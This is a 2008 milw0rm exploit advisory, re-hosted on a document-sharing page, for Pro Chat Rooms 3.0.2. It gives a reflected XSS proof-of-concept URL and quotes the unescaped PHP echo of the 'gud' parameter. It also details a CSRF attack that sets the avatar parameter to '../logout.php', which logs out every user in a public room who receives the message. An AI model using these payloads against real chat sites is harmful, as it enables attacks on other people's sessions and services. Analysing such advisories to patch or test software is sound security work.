Pro Chat Rooms 3.0.2 XSSCSRF Multiple Vulnerabilities

Document Sample
Pro Chat Rooms 3.0.2 XSSCSRF Multiple Vulnerabilities Powered By Docstoc
					                         Pro Chat Rooms 3.0.2 XSSCSRF Multiple Vulnerabilities                                    Page 1/2
  1    #########################################################################
  2    Pro Chat Rooms Version 3.0.2 (XSS/CSRF) Vulnerabilties
  3    #########################################################################
  4
  5
  6    ## AUTHOR : ZynbER
  7    ## MAiL   : ZynbER[at]Gmail[dot]com
  8    ## HOME   : NoWhere
  9
  10
  11   ## Script WebSite : http://www.prochatrooms.com
  12
  13   ## Version : Pro Chat Rooms Version 3.0.2
  14
  15
  16   ## EXPLOITS :
  17
  18   −==XSS==−
  19
  20   http://www.yoursite.com/[path]/profiles/index.php?gud=XSSED
  21
  22   Vulnerable code in "/profiles/index.php"
  23
  24
  25   <b><?php echo C_PRO2;?>: <?php echo $_GET[’gud’];?></b>
  26
  27
  28   −==CSRF==−
  29
  30   When a user sends a message in public room or in pm to onther user ; there is a parameter
  31   to set an avatar (ex:"image.gif"); we will exploit this param to run a CSRF when user get our message
  32
  33   The JS sending function; here u can see all params needed to POST a message to user/room
  34
  35   //Add a message to the chat server.
  36   function sendChatText() {
  37
  38   if(!document.getElementById(’txt_message’).value) {
  39      alert("You have not entered a message ");
  40      return;
  41   }
  42       if(document.getElementById(’whisper’).value.toLowerCase() == document.getElementById(’thisuser’).value.toLowerCas
       e()) {
  43       alert("You cannot whisper to yourself! ");
  44       return;
  45   }
  46   if (sendReq.readyState == 4 || sendReq.readyState == 0) {
  47       sendReq.open("POST", ’sendData.php?chat=1&last=’ + lastMessage + ’&room=’ + room, true);
  48       sendReq.setRequestHeader(’Content−Type’,’application/x−www−form−urlencoded’);
  49       sendReq.onreadystatechange = handleSendChat;
  50       var param = ’message=’ + document.getElementById(’txt_message’).value;
  51       param += ’&name=’ + chat_user;
ZynbER                                                                                                             12/10/2008
                            Pro Chat Rooms 3.0.2 XSSCSRF Multiple Vulnerabilities                                    Page 2/2
  52       param += ’&nid=’ + chat_userid;
  53       param += ’&chat=1’;
  54       param += ’&room=’ + room;
  55       param += ’&whisper=’ + document.getElementById(’whisper’).value;
  56       param += ’&fontface=’ + document.getElementById(’font_face’).value;
  57       param += ’&fontcolor=’ + document.getElementById(’font_color’).value;
  58       param += ’&fontheight=’ + document.getElementById(’font_height’).value;
  59       param += ’&fontstyle=’ + document.getElementById(’font_style’).value;
  60       param += ’&avatar=’ + document.getElementById(’user_avatar’).value;
  61       sendReq.send(param);
  62       document.getElementById(’txt_message’).value = ’’;
  63       }
  64   }
  65
  66
  67   Exploit Example:
  68
  69   default    ==> http://www.yoursite.com/[path]/Avatars/online.gif
  70
  71
  72   Your mallecious CSRF param;     avatar=../logout.php ==> New avatar path http://www.yoursite.com/[path]/logout.php
  73
  74
  75   in this example the user will logout when he recieves ur message; in a public room all users will
  76   be loged out from the room ;)
  77
  78
  79
  80
  81   ## Note:
  82
  83   This infos are for educational purpose only;
  84   I’m not responsable for any damage caused...
  85
  86
  87
  88   ## GREETZ    :   Str0ke − 7issa − Zakhm0ki − samIR − Chicha − Sn@k−baraka
  89
  90             −=== Marequin est fière de l’être ===−
  91
  92   #########################################################################
  93   Pro Chat Rooms Version 3.0.2   (XSS/CSRF) Vulnerabilties
  94   #########################################################################
  95
  96   # milw0rm.com [2008−12−10]




ZynbER                                                                                                                12/10/2008

				
DOCUMENT INFO
Shared By:
Categories:
Stats:
views:30
posted:5/24/2010
language:English
pages:2